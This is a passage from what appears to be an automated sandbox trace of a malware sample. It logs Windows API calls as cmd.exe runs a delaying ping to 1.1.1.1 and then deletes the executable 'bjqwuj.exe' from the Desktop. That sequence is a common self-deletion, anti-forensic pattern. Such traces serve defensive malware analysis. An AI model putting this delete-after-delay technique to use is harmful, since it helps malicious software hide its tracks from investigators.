(Heap=0x2d0000, Flags=0x0, Ptr=0x2e3630, Size=0x4) returned 0x2e3630 [0072.477] FindClose (in: hFindFile=0x2e35f0 | out: hFindFile=0x2e35f0) returned 1 [0072.477] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0072.477] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0072.477] GetConsoleTitleW (in: lpConsoleTitle=0x16f438, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.477] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f2c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f388 | out: lpAttributeList=0x16f2c0, lpSize=0x16f388) returned 1 [0072.477] UpdateProcThreadAttribute (in: lpAttributeList=0x16f2c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f380, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f2c0, lpPreviousValue=0x0) returned 1 [0072.477] GetStartupInfoW (in: lpStartupInfo=0x16f27c | out: lpStartupInfo=0x16f27c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0072.478] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0072.479] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping 1.1.1.1 -n 3 -w 3000 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16f31c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping 1.1.1.1 -n 3 -w 3000 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f368 | out: lpCommandLine="ping 1.1.1.1 -n 3 -w 3000 ", lpProcessInformation=0x16f368*(hProcess=0x7c, hThread=0x78, dwProcessId=0x60c, dwThreadId=0x798)) returned 1 [0072.537] CloseHandle (hObject=0x78) returned 1 [0072.537] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0072.537] GetProcessHeap () returned 0x2d0000 [0072.537] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4d00 | out: hHeap=0x2d0000) returned 1 [0072.537] GetEnvironmentStringsW () returned 0x2e4458* [0072.537] GetProcessHeap () returned 0x2d0000 [0072.537] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb46) returned 0x2e7850 [0072.537] FreeEnvironmentStringsW (penv=0x2e4458) returned 1 [0072.537] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0077.319] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x16f25c | out: lpExitCode=0x16f25c*=0x0) returned 1 [0077.319] CloseHandle (hObject=0x7c) returned 1 [0077.320] _vsnwprintf (in: _Buffer=0x16f3a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f268 | out: _Buffer="00000000") returned 8 [0077.320] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0077.320] GetProcessHeap () returned 0x2d0000 [0077.320] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e7850 | out: hHeap=0x2d0000) returned 1 [0077.320] GetEnvironmentStringsW () returned 0x2e7850* [0077.320] GetProcessHeap () returned 0x2d0000 [0077.320] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb6c) returned 0x2e83c8 [0077.320] FreeEnvironmentStringsW (penv=0x2e7850) returned 1 [0077.320] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0077.320] GetProcessHeap () returned 0x2d0000 [0077.320] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e83c8 | out: hHeap=0x2d0000) returned 1 [0077.320] GetEnvironmentStringsW () returned 0x2e7850* [0077.320] GetProcessHeap () returned 0x2d0000 [0077.320] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb6c) returned 0x2e83c8 [0077.320] FreeEnvironmentStringsW (penv=0x2e7850) returned 1 [0077.320] GetProcessHeap () returned 0x2d0000 [0077.320] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2dfff0 | out: hHeap=0x2d0000) returned 1 [0077.320] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f2c0 | out: lpAttributeList=0x16f2c0) [0077.321] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0077.321] _close (_FileHandle=3) returned 0 [0077.322] GetConsoleTitleW (in: lpConsoleTitle=0x16f6a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0077.322] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e4fd0, Size=0x80) returned 0x2e4fd0 [0077.322] GetProcessHeap () returned 0x2d0000 [0077.322] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e4fd0) returned 0x80 [0077.323] GetProcessHeap () returned 0x2d0000 [0077.323] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xf0) returned 0x2e5058 [0077.323] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e5058, Size=0x80) returned 0x2e5058 [0077.323] GetProcessHeap () returned 0x2d0000 [0077.323] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e5058) returned 0x80 [0077.325] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16f45c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.325] GetProcessHeap () returned 0x2d0000 [0077.325] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x38) returned 0x2e42a8 [0077.325] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x16e4ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.325] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e71c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x16e720, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x16e71c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0077.326] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0077.326] GetProcessHeap () returned 0x2d0000 [0077.326] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2c) returned 0x2df4c0 [0077.326] GetProcessHeap () returned 0x2d0000 [0077.326] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x258) returned 0x2e50e0 [0077.326] _wcsicmp (_String1="bjqwuj.exe", _String2=".") returned 52 [0077.326] _wcsicmp (_String1="bjqwuj.exe", _String2="..") returned 52 [0077.326] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe")) returned 0x20 [0077.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e5348 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0077.326] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", nBufferLength=0x104, lpBuffer=0x16eb40, lpFilePart=0x16eb28 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpFilePart=0x16eb28*="bjqwuj.exe") returned 0x30 [0077.326] SetErrorMode (uMode=0x0) returned 0x1 [0077.326] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0077.327] GetProcessHeap () returned 0x2d0000 [0077.327] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x258) returned 0x2e5558 [0077.327] _wcsicmp (_String1="bjqwuj.exe", _String2=".") returned 52 [0077.327] _wcsicmp (_String1="bjqwuj.exe", _String2="..") returned 52 [0077.327] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe")) returned 0x20 [0077.327] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", fInfoLevelId=0x0, lpFindFileData=0x2e237c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e237c) returned 0x2e2b80 [0077.327] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe")) returned 1 [0077.328] FindNextFileW (in: hFindFile=0x2e2b80, lpFindFileData=0x2e237c | out: lpFindFileData=0x2e237c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa80ac680, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xa80ac680, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xb1dffa00, ftLastWriteTime.dwHighDateTime=0x1d661bc, nFileSizeHigh=0x0, nFileSizeLow=0xfdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bjqwuj.exe", cAlternateFileName="")) returned 0 [0077.329] GetLastError () returned 0x12 [0077.329] FindClose (in: hFindFile=0x2e2b80 | out: hFindFile=0x2e2b80) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2370 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e2310 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2d08d0 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e57b8 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5558 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5340 | out: hHeap=0x2d0000) returned 1 [0077.329] GetProcessHeap () returned 0x2d0000 [0077.329] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e50e0 | out: hHeap=0x2d0000) returned 1 [0077.330] GetProcessHeap () returned 0x2d0000 [0077.330] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2df4c0 | out: hHeap=0x2d0000) returned 1 [0077.330] GetProcessHeap () returned 0x2d0000 [0077.330] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e42a8 | out: hHeap=0x2d0000) returned 1 [0077.330] GetProcessHeap () returned 0x2d0000 [0077.330] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e3640 | out: hHeap=0x2d0000) returned 1 [0077.330] GetProcessHeap () returned 0x2d0000 [0077.330] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5058 | out: hHeap=0x2d0000) returned 1 [0077.330] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.330] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.331] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.331] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6a41ac | out: lpMode=0x4a6a41ac) returned 1 [0077.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6a41b0 | out: lpMode=0x4a6a41b0) returned 1 [0077.331] SetConsoleInputExeNameW () returned 0x1 [0077.331] GetConsoleOutputCP () returned 0x1b5 [0077.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6a4260 | out: lpCPInfo=0x4a6a4260) returned 1 [0077.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.332] exit (_Code=0) Process: id = "4" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x293dc000" os_pid = "0x60c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x6c0" cmd_line = "ping 1.1.1.1 -n 3 -w 3000 " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x798 [0072.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefd9c | out: lpSystemTimeAsFileTime=0xefd9c*(dwLowDateTime=0xc8adb1e0, dwHighDateTime=0x1d661bd)) [0072.710] GetCurrentProcessId () returned 0x60c [0072.710] GetCurrentThreadId () returned 0x798 [0072.710] GetTickCount () returned 0x1149389 [0072.710] QueryPerformanceCounter (in: lpPerformanceCount=0xefd94 | out: lpPerformanceCount=0xefd94*=19303280980) returned 1 [0072.712] GetModuleHandleA (lpModuleName=0x0) returned 0xbe0000 [0072.712] __set_app_type (_Type=0x1) [0072.712] __p__fmode () returned 0x770331f4 [0072.712] __p__commode () returned 0x770331fc [0072.712] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbe2ae1) returned 0x0 [0072.712] __getmainargs (in: _Argc=0xbe50d4, _Argv=0xbe50dc, _Env=0xbe50d8, _DoWildCard=0, _StartInfo=0xbe50e8 | out: _Argc=0xbe50d4, _Argv=0xbe50dc, _Env=0xbe50d8) returned 0 [0072.712] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.713] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0072.713] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0xbe5440 | out: lpWSAData=0xbe5440) returned 0 [0072.723] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xef82c | out: phkResult=0xef82c*=0x7c) returned 0x0 [0072.723] RegQueryValueExA (in: hKey=0x7c, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xef820, lpData=0xef828, lpcbData=0xef824*=0x4 | out: lpType=0xef820*=0x0, lpData=0xef828*=0x0, lpcbData=0xef824*=0x4) returned 0x2 [0072.723] RegCloseKey (hKey=0x7c) returned 0x0 [0072.723] getaddrinfo (in: pNodeName="1.1.1.1", pServiceName=0x0, pHints=0xef7f4*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xef81c | out: ppResult=0xef81c*=0x343488*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x33f0b0*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), ai_next=0x0)) returned 0 [0072.724] FreeAddrInfoW (pAddrInfo=0x343488*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x33f0b0*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), ai_next=0x0)) [0072.724] IcmpCreateFile () returned 0x348bf0 [0073.022] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x34b7a8 [0073.022] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x354138 [0073.022] getnameinfo (in: pSockaddr=0xbe55e0*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), SockaddrLength=0x10, pNodeBuffer=0xefd1c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="1.1.1.1", pServiceBuffer=0x0) returned 0 [0074.211] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="X¿4") returned 0x12 [0074.220] CharToOemBuffA (in: lpszSrc="\r\nPinging 1.1.1.1 ", lpszDst=0x34bf58, cchDstLength=0x12 | out: lpszDst="\r\nPinging 1.1.1.1 ") returned 1 [0074.459] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.459] _write (in: _FileHandle=1, _Buf=0x34bf58*, _MaxCharCount=0x12 | out: _Buf=0x34bf58*) returned 18 [0074.459] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.459] LocalFree (hMem=0x34bf58) returned 0x0 [0074.459] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="") returned 0x18 [0074.459] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x34ba00, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0074.459] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.459] _write (in: _FileHandle=1, _Buf=0x34ba00*, _MaxCharCount=0x18 | out: _Buf=0x34ba00*) returned 24 [0074.459] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.459] LocalFree (hMem=0x34ba00) returned 0x0 [0074.459] SetConsoleCtrlHandler (HandlerRoutine=0xbe17ca, Add=1) returned 1 [0074.459] IcmpSendEcho2Ex (in: IcmpHandle=0x348bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x1010101, RequestData=0x34b7a8, RequestSize=0x20, RequestOptions=0xef848, ReplyBuffer=0x354138, ReplySize=0x1ff8, Timeout=0xbb8 | out: ReplyBuffer=0x354138) returned 0x1 [0074.603] inet_ntoa (in=0x1010101) returned="1.1.1.1" [0074.603] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="X¿4") returned 0x14 [0074.603] CharToOemBuffA (in: lpszSrc="Reply from 1.1.1.1: ", lpszDst=0x34bf58, cchDstLength=0x14 | out: lpszDst="Reply from 1.1.1.1: ") returned 1 [0074.603] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.603] _write (in: _FileHandle=1, _Buf=0x34bf58*, _MaxCharCount=0x14 | out: _Buf=0x34bf58*) returned 20 [0074.603] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.604] LocalFree (hMem=0x34bf58) returned 0x0 [0074.604] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x9 [0074.604] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x34c898, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0074.604] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.604] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x9 | out: _Buf=0x34c898*) returned 9 [0074.604] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.604] LocalFree (hMem=0x34c898) returned 0x0 [0074.604] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0xa [0074.604] CharToOemBuffA (in: lpszSrc="time=17ms ", lpszDst=0x34c898, cchDstLength=0xa | out: lpszDst="time=17ms ") returned 1 [0074.604] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.604] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0xa | out: _Buf=0x34c898*) returned 10 [0074.604] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.604] LocalFree (hMem=0x34c898) returned 0x0 [0074.604] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x8 [0074.604] CharToOemBuffA (in: lpszSrc="TTL=54\r\n", lpszDst=0x34c898, cchDstLength=0x8 | out: lpszDst="TTL=54\r\n") returned 1 [0074.604] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0074.604] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x8 | out: _Buf=0x34c898*) returned 8 [0074.604] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0074.604] LocalFree (hMem=0x34c898) returned 0x0 [0074.604] Sleep (dwMilliseconds=0x3d7) [0075.621] IcmpSendEcho2Ex (in: IcmpHandle=0x348bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x1010101, RequestData=0x34b7a8, RequestSize=0x20, RequestOptions=0xef848, ReplyBuffer=0x354138, ReplySize=0x1ff8, Timeout=0xbb8 | out: ReplyBuffer=0x354138) returned 0x1 [0075.676] inet_ntoa (in=0x1010101) returned="1.1.1.1" [0075.676] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="X¿4") returned 0x14 [0075.676] CharToOemBuffA (in: lpszSrc="Reply from 1.1.1.1: ", lpszDst=0x34bf58, cchDstLength=0x14 | out: lpszDst="Reply from 1.1.1.1: ") returned 1 [0075.676] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.676] _write (in: _FileHandle=1, _Buf=0x34bf58*, _MaxCharCount=0x14 | out: _Buf=0x34bf58*) returned 20 [0075.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.676] LocalFree (hMem=0x34bf58) returned 0x0 [0075.676] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x9 [0075.676] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x34c898, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0075.676] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.676] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x9 | out: _Buf=0x34c898*) returned 9 [0075.676] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.677] LocalFree (hMem=0x34c898) returned 0x0 [0075.677] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0xa [0075.677] CharToOemBuffA (in: lpszSrc="time=15ms ", lpszDst=0x34c898, cchDstLength=0xa | out: lpszDst="time=15ms ") returned 1 [0075.677] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.677] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0xa | out: _Buf=0x34c898*) returned 10 [0075.677] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.677] LocalFree (hMem=0x34c898) returned 0x0 [0075.677] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x8 [0075.677] CharToOemBuffA (in: lpszSrc="TTL=54\r\n", lpszDst=0x34c898, cchDstLength=0x8 | out: lpszDst="TTL=54\r\n") returned 1 [0075.677] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.677] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x8 | out: _Buf=0x34c898*) returned 8 [0075.677] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.677] LocalFree (hMem=0x34c898) returned 0x0 [0075.677] Sleep (dwMilliseconds=0x3d9) [0076.902] IcmpSendEcho2Ex (in: IcmpHandle=0x348bf0, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x1010101, RequestData=0x34b7a8, RequestSize=0x20, RequestOptions=0xef848, ReplyBuffer=0x354138, ReplySize=0x1ff8, Timeout=0xbb8 | out: ReplyBuffer=0x354138) returned 0x1 [0077.074] inet_ntoa (in=0x1010101) returned="1.1.1.1" [0077.074] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="X¿4") returned 0x14 [0077.074] CharToOemBuffA (in: lpszSrc="Reply from 1.1.1.1: ", lpszDst=0x34bf58, cchDstLength=0x14 | out: lpszDst="Reply from 1.1.1.1: ") returned 1 [0077.074] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.074] _write (in: _FileHandle=1, _Buf=0x34bf58*, _MaxCharCount=0x14 | out: _Buf=0x34bf58*) returned 20 [0077.074] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.074] LocalFree (hMem=0x34bf58) returned 0x0 [0077.074] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x9 [0077.075] CharToOemBuffA (in: lpszSrc="bytes=32 ", lpszDst=0x34c898, cchDstLength=0x9 | out: lpszDst="bytes=32 ") returned 1 [0077.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.075] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x9 | out: _Buf=0x34c898*) returned 9 [0077.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.075] LocalFree (hMem=0x34c898) returned 0x0 [0077.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0xa [0077.075] CharToOemBuffA (in: lpszSrc="time=14ms ", lpszDst=0x34c898, cchDstLength=0xa | out: lpszDst="time=14ms ") returned 1 [0077.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.075] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0xa | out: _Buf=0x34c898*) returned 10 [0077.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.075] LocalFree (hMem=0x34c898) returned 0x0 [0077.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xef820, nSize=0x0, Arguments=0xef81c | out: lpBuffer="\x98È4") returned 0x8 [0077.075] CharToOemBuffA (in: lpszSrc="TTL=54\r\n", lpszDst=0x34c898, cchDstLength=0x8 | out: lpszDst="TTL=54\r\n") returned 1 [0077.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.075] _write (in: _FileHandle=1, _Buf=0x34c898*, _MaxCharCount=0x8 | out: _Buf=0x34c898*) returned 8 [0077.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.075] LocalFree (hMem=0x34c898) returned 0x0 [0077.075] getnameinfo (in: pSockaddr=0xbe55e0*(sa_family=2, sin_port=0x0, sin_addr="1.1.1.1"), SockaddrLength=0x10, pNodeBuffer=0xef7e8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="1.1.1.1", 